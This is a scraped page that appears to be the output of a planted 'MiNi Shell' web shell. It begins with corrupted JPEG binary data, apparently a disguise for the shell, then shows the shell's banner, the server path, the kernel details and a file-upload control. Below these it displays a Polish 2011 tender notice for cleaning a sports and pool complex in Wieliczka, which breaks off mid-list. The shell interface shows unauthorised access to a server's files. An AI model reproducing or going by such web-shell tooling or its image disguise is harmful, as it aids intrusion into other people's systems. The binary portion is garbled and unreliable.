JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111202/409712-N-2011.html

<p class="kh_header"><b>Wieliczka: Usługa sprzątania CER</b><br>
<b>Numer ogłoszenia: 409712 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SOLNE MIASTO  Sp. z o.o. , ul. Tadeusza Kościuszki 15, 32-020 Wieliczka, woj. małopolskie, tel. 12 357 32 64, faks 12 268 68 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.solnemiasto.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa sprzątania CER.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest codzienne świadczenie specjalistycznych usług sprzątania Solne Miasto Sp z o. o . Wykazy pomieszczeń wraz z ich metrażem, zakresem czynności, harmonogramem ich wykonywania, procedurami czyszczenia niecki basenowej oraz wymaganiami dotyczącymi używanych środków chemicznych przedstawiono poniżej.
 Metraże powierzchni przeznaczonych do sprzątania:

część basenowa:
pomieszczenia szatniowe o powierzchni 176,62 m2
korytarze, winda oraz klatki schodowe o powierzchni 258,41 m2
pomieszczenia sanitarne o powierzchni 65,38 m2
drzwi wewnętrzne oraz zewnętrzne, parapety wewnętrzne, winda, uchwyty, poręcze
opróżnianie koszy na śmieci znajdujących się na terenie basenu
uzupełnianie środków higienicznych w sanitariatach -papier toaletowy, mydło w płynie, ręczniki papierowe
widownia o powierzchni 203,55 m2
sauny o powierzchni 75,57 m2
ściąganie wody z hali basenowej 1089,62 m2
czyszczenie elementów metalowych balustrad, baterii zlewozmywakowych, baterii prysznicowych, luster, kratek wentylacyjnych, elementów drewnianych
hala basenowa o powierzchni 1089,62 m2
pomieszczenia administracyjne o powierzchni 170,9 m2
punkt medyczny, pomieszczenia socjalne ratowników o powierzchni 40,28 m2
magazyn basenu o powierzchni 8,5 m2
szyby i przeszklenia:
zewnętrznych o pow. ok. 454 m2 
wewnętrznych o wysokości przeszkleń do 2 m - o pow. ok. 148 m2  wewnętrznych o wysokości przeszkleń powyżej 2m - o pow. ok. 40 m2 
Mycie niecki basenowej nastąpi 1 raz w trakcie przerwy technicznej.
Mycie ścian hali basenowej o pow. ok. 325 m2 

Zamawiający zapewni Wykonawcy 2 pomieszczenia -1 magazyn o pow. 10 m2, 1 pomieszczenie socjalne o pow. 10m2


Hala sportowa wraz z częścią administracyjną.
zespół toalet i sanitariatów o powierzchni 65,21m2 hala sportowa i 56m2 część administracyjna
korytarze i klatki schodowe o powierzchni 192,82m2
hol wejściowy o powierzchni 110,8 m2
szatnie o powierzchni 166,72 m2
drzwi, parapety, balustrady, uchwyty i poręcze
pomieszczenia administracji o powierzchni 50,52 m2
pomieszczenie komentatorów o powierzchni 9,58 m2
zaplecze socjalne o powierzchni 13,04 m2
siłownia o powierzchni 124,62 m2
widownia i kuluary o powierzchni 441,25 m2
arena hali o powierzchni 1170,58 m2
Mycie szyb i przeszkleń powierzchnia około 13m2

Patio
Wejście oraz dziedziniec  powierzchnia 934,02 m2 z kamienia 
mycie szyb i przeszkleń 
ściany osłonowej o powierzchni 146,64 m2
szyb i przeszkleń fasady patio o powierzchni 146,54 m2 
szyby i przeszklenia - prace na wysokości 1056 m2


część edukacyjna, 
recepcja 41,30m2 powierzchni
zespół toalet o powierzchni 63,04m2
korytarze o powierzchni 179m2
wiatrołap o powierzchni 6,61m2
hol wejściowy o powierzchni 33,77m2
biura o powierzchni 42m2
sala audytoryjna o powierzchni 84,25m2
sala audytoryjna o powierzchni 62,70m2
sale dydaktyczne 5 segmentów po 60,5m razem 302,5m2
uzupełnianie środków higienicznych w sanitariatach
Mycie szyb i przeszkleń raz w tygodniu o powierzchni około 62,58m2


Ogólnie powierzchnie do czyszczenia:
1170,58m2 - tarkett
1560,71m2 - wykładzina podłogowa z winylu
495,48m2 - płytki  
szyby i przeszklenia o powierzchni około 368,7705m
uzupełnianie środków higienicznych w sanitariatach	


HARMONOGRAM CZYNNOŚCI:

Basen Solne Miasto CER  jest czynny dla klientów przez 7 dni w tygodniu od 6:30 do 22:30, Hala sportowa i cześć dydaktyczne będzie czynna w godz. 7.00 do ok. 22.30 z wyłączeniem Świąt Bożego Narodzenia i Wielkanocy oraz 1 listopada i 1 stycznia. 
W terminie wrzesień  2012 r. przewidywana jest przerwa technologiczna, w okresie której zintensyfikowane będą usługi sprzątania hal basenowych.
Środki czystości -specjalistyczne, materiały eksploatacyjne - worki na śmieci, papier toaletowy, ręczniki papierowe, mydło w płynie, oraz urządzenia i przybory do sprzątania dostarczy Wykonawca. 
Zamawiający wymaga aby wykonywanie przedmiotu zamówienia odbywało się w następujący sposób:
W drodze serwisu dziennego: wykonywanego w godzinach od 6.30 do 22.30 w części basenowej oraz w godzinach od 7.00 do ok. 23.00 w części hali sportowej poprzez prace porządkowo-czystościowe, których celem jest bieżące utrzymanie czystości szatni basenowych, sanitariatów  oraz holi w częstotliwości i szczegółowym zakresie opisanym w tabeli 
W drodze sprzątania zasadniczego nocnego wykonywanego w godzinach od 23:30 do 5:30, poprzez prace porządkowo-czystościowe w częstotliwości i szczegółowym zakresie opisanym w tabeli 
Wymagana minimalna obsada serwisów:

Od poniedziałku

do niedzieli  Ilość pracowników
Część basenowa	Hala sportowa z zapleczem, część Edukacyjno-Konferencyjna
06:30 -  8:00- 1 osoba	
08:00 - 22:30- 2 osoby 	
07.00 - 23.00- 1 osoba

W miarę potrzeby, do zamawiającego należy decyzja o przesunięciu osób z części basenowej na część hali sportowej lub edukacyjnej.
Osoba wyznaczona przez wykonawcę do wykonywania czynności sprzątających, ma obowiązek zgłoszenia swojej obecności osobie wskazanej przez zamawiającego.



   
SZCZEGÓŁOWY WYKAZ CZYNNOŚCI WRAZ Z ICH CZĘSTOTLIWOŚCIĄ:
L.p. Rodzaj czynności Serwis dzienny

Częstotliwość w okresie objętym zamówieniem	
Zasadnicze sprzątanie nocne
Częstotliwość w okresie objętym zamówienie

Sprzątanie części basenowej	 	
Sprzątanie widowni  		codziennie
czyszczenie schodów oraz korytarza	Na bieżąco codziennie
Mycie przeszkleń obustronne 	codziennie
Czyszczenie siedzisk Na bieżąco	codziennie
mycie i dezynfekcja powierzchni plażowych wokół basenów codziennie
mycie i dezynfekcja ścian pokrytych flizami codziennie
sprzątanie i dezynfekcja niecek basenów o łącznej powierzchni 622 m2	1x przerwa techniczna	
mycie murków wokół basenów		codziennie
zraszanie, przecieranie, odkurzanie roślinności		1 x / tydzień
mycie dostępnych okien i przeszkleń hali basenowej -do wysokości 2.40 	Na bieżąco	codziennie
czyszczenie siedzisk ratowników rozmieszczonych wokół basenów	codziennie 
czyszczenie poręczy i barierek metalowych , balustrad		codziennie
mycie i dezynfekcja stanowiska startowego oraz podestów przy zjeżdżalni, mostka		codziennie
czyszczenie rynny zjazdowej od wewnątrz i zewnątrz  w zakresie dostępnym	codziennie
czyszczenie rynny zjazdowej od wewnątrz i zewnątrz  w pełnym zakresie	1x przerwa techniczna	
mycie parapetów codziennie
Mycie szyb i przeszkleń hali basenowej do pełnej wysokości 1 x rok
Sprzątanie pomieszczeń szatni, pryszniców oraz sanitariatów przy hali basenowej		
Zapewnienie bieżącego zbierania wody we wszystkich pomieszczeniach natrysków, WC i w szatniach.  Nieczystości stałe ze ściągaczy bezwzględnie muszą być wyrzucane do koszy, a nie zagarniane do kratek ściekowych Na bieżąco 	
Mycie i dezynfekcja urządzeń sanitarnych -umywalki, baterie, kabiny natryskowe, miski klozetowe, pisuary, itp. Na bieżąco codziennie
Mycie i dezynfekcja szafek ubraniowych - codziennie
Ściąganie kurzy z szafek ubraniowych 	- codziennie
Mycie i dezynfekcja powierzchni podłóg i ścian pokrytych płytkami ceramicznymi -codziennie
Opróżnianie koszy i wymiana wkładów foliowych	Na bieżąco	
Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz -codziennie
Mycie i dezynfekcja podajników na mydło i papier toaletowy z zewnątrz - codziennie 
Mycie luster Na bieżąco codziennie
Mycie i dezynfekcja ścian w przebieralni i szatni pokrytych flizami- codziennie
Mycie i dezynfekcja kabin przebieralni - codziennie
Odkurzanie, mycie i dezynfekcja suszarek do włosów w holach -codziennie
Przecieranie i dezynfekcja ławek w holu szatniowym szatniowych  i w pomieszczeniu z suszarkami - codziennie
Mycie i dezynfekcja ścianek w toaletach przy prysznicach - codziennie 
Odkurzanie i dezynfekcja miejsc wlotów do wentylacji wyciągowej - 1x /tydzień
Sprzątanie pomieszczeń sauny 	 	
Zapewnienie bieżącego zbierania wody oraz bieżące usuwanie części stałych przy kratkach ściekowych w pomieszczeniach sauny, natrysków, WC. Nieczystości stałe ze ściągaczy bezwzględnie muszą być wyrzucane do koszy, a nie zagarniane do kratek ściekowych	Na bieżąco	
Mycie i dezynfekcja siedzisk	codziennie
Mycie i dezynfekcja podłóg, ścian i sufitów w saunach -codziennie
Mycie i dezynfekcja drzwi szklanych oraz -beczki do schładzania ciała - codziennie
Mycie i dezynfekcja toalet i umywalek	Na bieżąco	codziennie
Mycie i dezynfekcja natrysków przy saunach	-	codziennie
Mycie całości posadzek w saunach	-	codziennie
Mycie i dezynfekcja wnęk pryszniców	-	codziennie
Mycie i dezynfekcja leżaków i innego sprzętu stanowiącego wyposażenie sauny	-	codziennie
Czyszczenie fug	-	codziennie
pomieszczenia ratowników 	 	
  Mycie posadzek w pomieszczeniach ratowników   	-	codziennie
 Mycie i dezynfekcja pomieszczeń sanitariatów wraz z wyposażeniem 	 Na bieżąco
	codziennie
 Mycie szafek z zewnątrz w pomieszczeniach ratowników  	-	codziennie
 Opróżnianie koszy na śmieci oraz wymiana worków  	-	codziennie
 Mycie przeszkleń miedzy halą basenową a pomieszczeniami ratowników i instruktorów 	-	codziennie
Mycie i dezynfekcja przebieralni   
  	-	codziennie
Mycie okien 		1x miesiąc
	Sprzątanie siłowni		
 Mycie podłóg, wykładzin,	Na bieżąco	
Mycie, dezynfekcja i odkurzanie urządzeń siłowych oraz drabinek		codziennie
 Opróżnianie i mycie koszy na śmieci, wymiana wkładów foliowych		codziennie
 Mycie luster i przeszkleń,   mycie biurek, drzwi, mebli		codziennie
Mycie i dezynfekcja siedzisk 		codziennie
Sprzątanie pomieszczeń biurowych		
Odkurzanie powierzchni dywanowych		codziennie
 Czyszczenie parapetów, mycie biurek, drzwi, mebli		codziennie
 Odkurzanie sprzętu biurowego (komputery, aparaty telefoniczne, drukarki)		codziennie
 Opróżnianie i mycie koszy na śmieci, wymiana wkładów foliowych		codziennie
 Opróżnianie i odkurzanie niszczarki		codziennie
 Mycie okien, grzejników c.o.	-	1	x w miesiącu
Mycie podłogi oraz przeszkleń w pomieszczeniu komentatora 
		codziennie
	Sprzątanie powierzchni ogólnych	 	
 Mycie holi 	Na bieżąco	codziennie
 Mycie głównych klatek schodowych i korytarzy	Na bieżąco
	codziennie
 Odkurzanie wykładzin dywanowych, mat wejściowych	Na bieżąco
	codziennie
 Wycieranie na wilgotno lub mycie drzwi 	-	codziennie
 Opróżnianie koszy i wymiana wkładów foliowych	-	codziennie
 Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz	-	codziennie
 Mycie i przecieranie dostępnych przeszkleń wejść z zewnątrz i od wewnątrz do wysokości 2,40 m	-	codziennie
 Mycie i przecieranie dostępnych przeszkleń holi z zewnątrz i od wewnątrz do wysokości 2,40 m	- 	codziennie
 Mycie dostępnych przeszkleń hali basenowej od strony holu głównego- do wysokości 2,40 m	-	codziennie
 Mycie i przecieranie przeszkleń schodów holi i balustrad  dwustronnie 	-2 x na tydzień
 Czyszczenie barierek i poręczy wewnątrz budynku 	- 	codziennie
 Utrzymanie w czystości windy osobowej wewnątrz wraz ze stalowymi elementami przy drzwiach          a także przeszkleń windy		codziennie
 Mycie i dezynfekcja łazienek i sanitariatów	Na bieżąco
	codziennie
 Mycie pomieszczeń kas	Na bieżąco
	codziennie
Czyszczenie bramek wyjściowych wykonanych ze stali	-	codziennie
Sprzątanie terenu przed budynkiem ;opróżnianie koszy na śmieci	Na bieżąco	
Mycie szyb i przeszkleń windy do pełnej wysokości		1 x rok
Sprzątanie hali sportowej	 	

	Mycie holi 	Na bieżąco	codziennie
	Mycie głównych klatek schodowych i korytarzy	Na bieżąco
	codziennie
	Odkurzanie wykładzin dywanowych, mat wejściowych	Na bieżąco
	codziennie
	Wycieranie na wilgotno lub mycie drzwi 	-	codzi
nnie
	Opróżnianie koszy i wymiana wkładów foliowych	-	codziennie
	Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz	-	codziennie
	Mycie i przecieranie dostępnych przeszkleń wejść z zewnątrz i od wewnątrz do wysokości 2 m	
	codziennie
	Mycie i przecieranie dostępnych przeszkleń holi z zewnątrz i od wewnątrz do wysokości 2 m	- 	codziennie
	Mycie areny hali 	-	codziennie
	Czyszczenie wykładziny rozkładanej na hali w czasie imprez 	Na bieżąco	
	Mycie i przecieranie przeszkleń schodów holi i balustrad  dwustronnie 	-	2 x na tydzień
	Czyszczenie barierek, poręczy i parapetów wewnątrz budynku 	- 	codziennie
	Sprzątanie widowni  		codziennie
	   czyszczenie schodów oraz korytarza
	codziennie
	  Mycie przeszkleń		codziennie
		Czyszczenie siedzisk	Na bieżąco	codziennie
	Mycie i dezynfekcja łazienek i sanitariatów	Na bieżąco	codzienie
	Mycie i dezynfekcja pomieszczeń szatni oraz pryszniców przy hali sportowej	Na bieżąco	codziennie
	 Zapewnienie bieżącego zbierania wody we wszystkich pomieszczeniach natrysków, WC i w szatniach.  Nieczystości stałe ze ściągaczy bezwzględnie muszą być wyrzucane do koszy, a nie zagarniane do kratek ściekowych
	Na bieżąco	codziennie
	 Mycie i dezynfekcja urządzeń sanitarnych -umywalki, baterie, kabiny natryskowe, miski klozetowe, pisuary, itp.
	Na bieżąco	codziennie
	 Mycie i dezynfekcja szafek ubraniowych
		codziennie
	 Ściąganie kurzy z szafek ubraniowych
		codziennie
	 Mycie i dezynfekcja powierzchni podłóg i ścian pokrytych płytkami ceramicznymi
		codziennie
	 Opróżnianie koszy i wymiana wkładów foliowych
	Na bieżąco	codziennie
	 Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz
		codziennie
	 Mycie i dezynfekcja podajników na mydło i papier toaletowy z zewnątrz
		codziennie
	 Mycie luster
	Na bieżąco	codziennie
		Mycie pomieszczeń kas		codziennie
		Mycie pomieszczenie monitoringu	-	1x tydzień
			
Sprzątanie patio	 	

. Mycie dziedzińca	Na bieżąco	codziennie
 Odkurzanie wykładzin dywanowych, mat wejściowych	Na bieżąco
	codziennie
 Wycieranie na wilgotno lub mycie drzwi 	-	codziennie
 Opróżnianie koszy i wymiana wkładów foliowych	-	codziennie
 Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz	-	codziennie
 Mycie i przecieranie dostępnych przeszkleń wejść z zewnątrz i od wewnątrz 

 wysokości 2,40 m	-	codziennie
 Mycie i przecieranie dostępnych przeszkleń holi z zewnątrz i od wewnątrz do wysokości 2,40 m	- 	codziennie
 Mycie dostępnych przeszkleń hali basenowej od strony holu głównego i sali wielofunkcyjnej- do wysokości 2,40 m	-	codziennie
 Mycie i przecieranie przeszkleń schodów holi i balustrad  dwustronnie 	-	2 x na tydzień
Czyszczenie barierek, poręczy i parapetów 
	- 	codziennie
	Mycie szyb i przeszkleń do pełnej wysokości dziedzińca 		1 x rok
	Sprzątanie części edukacyjnej	 	

 Mycie holi, szatni		codziennie
 Mycie głównych klatek schodowych i korytarzy		codziennie
 Odkurzanie wykładzin dywanowych, mat wejściowych	Na bieżąco	codziennie
 Wycieranie na wilgotno lub mycie drzwi 	-	codziennie
 Opróżnianie koszy i wymiana wkładów foliowych	-	codziennie
 Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz	-	codziennie
 Mycie i przecieranie dostępnych przeszkleń wejść z zewnątrz i od wewnątrz do wysokości 2,40 m	-	codziennie
 Mycie i przecieranie dostępnych przeszkleń holi z zewnątrz i od wewnątrz do wysokości 2,40 m	- 	codziennie
 Mycie okien, grzejników c.o.	-	1x miesiąc
 Mycie i przecieranie przeszkleń schodów holi i balustrad  dwustronnie 	-	2 x na tydzień
 Czyszczenie barierek, poręczy i parapetów wewnątrz budynku 	- 	codziennie
 Mycie sal dydaktycznych, podłóg, mebli, siedzisk, sprzętu  		codziennie
 Mycie i dezynfekcja łazienek i sanitariatów	Na bieżąco
	codziennie
 Mycie pomieszczeń kas	-	codziennie
 Czyszczenie bramek wyjściowych wykonanych ze stali
	-	codziennie
	Mycie i dezynfekcja pomieszczenia przeznaczonego do zabawy dla dzieci	Na bieżąco	codziennie
Czyszczenie fug w pomieszczeniach pokrytych płytkami na podłogach i na ścianach oraz w narożnikach tych pomieszczeń i w miejscach trudnodostępnych		
codziennie

	Dezynfekcja hali basenowej oraz pomieszczeń szatni damskiej i męskiej oraz sanitariatów w szatniach.
		codziennie


Wykonawca odpowiada za spowodowane przez niego i jego pracowników zanieczyszczanie wody basenu oraz pozostawianie innych zanieczyszczeń - we wzorze umowy określone zostały kary umowne określone dla Wykonawcy, który w szczególności zanieczyścił wodę i nieckę basenu oraz który niewłaściwie wykonał usługi czyszczenia.

Wykonawca wyposaży swoich pracowników w jednolite, estetyczne ubrania z nazwą Firmy i identyfikatorem pracownika.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art.22 ust. 1 uPZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać wykonanie (zakończenie) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi polegającej na sprzątaniu i dezynfekcji pomieszczeń, odpowiadających swoim rodzajem  przedmiotowi niniejszego zamówienia, tj. obiektu sportowego z niecką basenową o wartości min. 100 000 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazu narzędzi, dostępnych wykonawcy usług  w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. Warunek zostanie spełniony poprzez udokumentowanie posiadania min. szorowarki jednotarczowej - 2 sztuki, myjki ciśnieniowej - 2 sztuki, maszyny czyszcząco-zbierającej o wydajności co najmniej 600 m2 na godzinę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art.22 ust. 1 uPZP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedstawić dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości min. 200 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

